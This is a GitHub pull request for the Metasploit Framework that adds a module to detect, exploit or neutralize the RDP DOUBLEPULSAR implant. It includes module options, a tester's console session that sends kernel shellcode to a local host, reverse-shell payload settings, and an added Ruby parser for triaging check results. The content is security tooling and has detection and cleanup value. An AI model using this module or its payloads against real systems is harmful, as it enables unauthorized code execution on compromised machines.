
Add RDP DOUBLEPULSAR command and control module #12903

Merged
merged 17 commits into from Feb 3, 2020

Conversation


wvu-r7 commented Feb 3, 2020

Future to-do: update kernel shellcode mixin to incorporate the various shellcode we've acquired.

msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > info

       Name: RDP DOUBLEPULSAR Remote Code Execution
     Module: exploit/windows/rdp/rdp_doublepulsar_rce
   Platform: Windows
       Arch: x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2017-04-14

Provided by:
  Equation Group
  Shadow Brokers
  Luke Jennings
  wvu <wvu@metasploit.com>
  Tom Sellers
  Spencer McIntyre

Module stability:
 crash-os-down

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Execute payload (x64)
  1   Neutralize implant

Check supported:
  Yes

Basic options:
  Name             Current Setting  Required  Description
  ----             ---------------  --------  -----------
  RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
  RDP_CLIENT_NAME  rdesktop         no        The client computer name to report during connect, UNSET = random
  RDP_DOMAIN                        no        The client domain name to report during connect
  RDP_USER                          no        The username to report during connect, UNSET = random
  RHOSTS                            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT            3389             yes       The target port (TCP)

Payload information:
  Space: 3316

Description:
  This module executes a Metasploit payload against the Equation
  Group's DOUBLEPULSAR implant for RDP. While this module primarily
  performs code execution against the implant, the "Neutralize
  implant" target allows you to disable the implant.

References:
  https://github.com/countercept/doublepulsar-detection-script

Also known as:
  DOUBLEPULSAR

Related modules:
  exploit/windows/smb/smb_doublepulsar_rce

msf5 exploit(windows/rdp/rdp_doublepulsar_rce) >

#12374

wvu-r7 added 17 commits Nov 13, 2019

vprint_good should be print_warning, and most vprints should be print,
even if in check, since check is critical functionality.

Thanks to @tsellers-r7 for testing XP and producing output to compare
against. Without a 32-bit test, the architecture guess was incorrect.
Additionally, product type had yet to be determined. The trailing bytes
were indeed significant! Thanks, Tom!

Found the struct that corresponds to the ping response!
smcintyre-r7 commented Feb 3, 2020

Tested successfully, appears to be working as intended. I'll have this landed momentarily.

msf5 > use exploit/windows/rdp/rdp_doublepulsar_rce 
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > show options 

Module options (exploit/windows/rdp/rdp_doublepulsar_rce):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
   RDP_CLIENT_NAME  rdesktop         no        The client computer name to report during connect, UNSET = random
   RDP_DOMAIN                        no        The client domain name to report during connect
   RDP_USER                          no        The username to report during connect, UNSET = random
   RHOSTS                            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT            3389             yes       The target port (TCP)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Execute payload (x64)


msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > check

[*] 127.0.0.1:3389 - Sending ping to DOUBLEPULSAR
[!] 127.0.0.1:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
[+] 127.0.0.1:3389 - Target is Windows Server 6.1.7601 SP1 x64
[+] 127.0.0.1:3389 - The target is vulnerable.
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > set PAYLOAD windows/x64/messagebox
PAYLOAD => windows/x64/messagebox
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > exploit

[-] 127.0.0.1:3389 - Exploit aborted due to failure: bad-config: 

Are you SURE you want to execute code against a nation-state implant?
You MAY contaminate forensic evidence if there is an investigation.

Disable the DefangedMode option if you have authorization to proceed.

[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > set DefangedMode false
DefangedMode => false
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > exploit

[*] 127.0.0.1:3389 - Sending ping to DOUBLEPULSAR
[!] 127.0.0.1:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
[+] 127.0.0.1:3389 - Target is Windows Server 6.1.7601 SP1 x64
[*] 127.0.0.1:3389 - Generating kernel shellcode with windows/x64/messagebox
[*] 127.0.0.1:3389 - Sending shellcode to DOUBLEPULSAR
[+] 127.0.0.1:3389 - Payload execution successful
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > show targets 

Exploit targets:

   Id  Name
   --  ----
   0   Execute payload (x64)
   1   Neutralize implant


msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > set TARGET 1
TARGET => 1
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > exploit

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] 127.0.0.1:3389 - Sending ping to DOUBLEPULSAR
[!] 127.0.0.1:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
[+] 127.0.0.1:3389 - Target is Windows Server 6.1.7601 SP1 x64
[*] 127.0.0.1:3389 - Neutralizing DOUBLEPULSAR
[+] 127.0.0.1:3389 - Implant neutralization successful
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > check

[*] 127.0.0.1:3389 - Sending ping to DOUBLEPULSAR
[-] 127.0.0.1:3389 - DOUBLEPULSAR not detected or disabled
[*] 127.0.0.1:3389 - The target is not exploitable.
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > 
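As an added example (not code from the module or this PR), the following Ruby script turns console output in the format of the transcript above into a per-host inventory, so a `check` sweep across a RHOSTS range can be triaged and a neutralization re-verified by a second `check`; the sample output and host addresses are constructed.

```ruby
# Added example (not the module's own code): per-host inventory from `check` output.
LINE_RE = /\A\[[*!+\-]\] (?<host>[^\s:]+):(?<port>\d+) - (?<msg>.*)\z/

# Returns { "host:port" => { status:, os:, verified: } }, where status is
# :unknown, :detected, :neutralized or :not_detected.
def parse_check_output(text)
  hosts = Hash.new { |h, k| h[k] = { status: :unknown, os: nil, verified: false } }
  text.each_line do |line|
    m = LINE_RE.match(line.strip) or next
    entry = hosts["#{m[:host]}:#{m[:port]}"]
    case m[:msg]
    when /DOUBLEPULSAR RDP IMPLANT DETECTED/
      entry[:status] = :detected
    when /\ATarget is (.+)\z/
      entry[:os] = Regexp.last_match(1)   # OS fingerprint taken from the ping response
    when /Implant neutralization successful/
      entry[:status] = :neutralized
    when /DOUBLEPULSAR not detected or disabled/
      # After a neutralization this re-check confirms the implant is gone; otherwise it was never seen.
      if entry[:status] == :neutralized
        entry[:verified] = true
      else
        entry[:status] = :not_detected
      end
    end
  end
  hosts
end

# Hosts that still answer as a live implant (detected, not yet neutralized).
def live_implants(hosts)
  hosts.select { |_, v| v[:status] == :detected }.keys
end

# Constructed sample in the transcript's format; the hosts are made up.
SAMPLE_OUTPUT = <<~LOG
  [*] 192.0.2.10:3389 - Sending ping to DOUBLEPULSAR
  [!] 192.0.2.10:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
  [+] 192.0.2.10:3389 - Target is Windows Server 6.1.7601 SP1 x64
  [*] 192.0.2.11:3389 - Sending ping to DOUBLEPULSAR
  [-] 192.0.2.11:3389 - DOUBLEPULSAR not detected or disabled
  [!] 192.0.2.12:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
  [+] 192.0.2.12:3389 - Target is Windows Server 6.1.7601 SP1 x64
  [+] 192.0.2.12:3389 - Implant neutralization successful
  [-] 192.0.2.12:3389 - DOUBLEPULSAR not detected or disabled
LOG
parse_check_output(SAMPLE_OUTPUT).each do |h, v|
  puts "#{h} status=#{v[:status]} verified=#{v[:verified]} os=#{v[:os]}"
end
```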
zeroSteiner pushed a commit that referenced this pull request Feb 3, 2020
@zeroSteiner zeroSteiner merged commit 7175126 into rapid7:master Feb 3, 2020
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed

smcintyre-r7 commented Feb 3, 2020

Release Notes

This adds an exploit module to leverage the RDP variant of the DOUBLEPULSAR implant from the Fuzzbunch framework. The module is capable of both detecting and neutralizing implants as well as executing code.

@wvu-r7 wvu-r7 deleted the wvu-r7:feature/doublepulsar branch Feb 3, 2020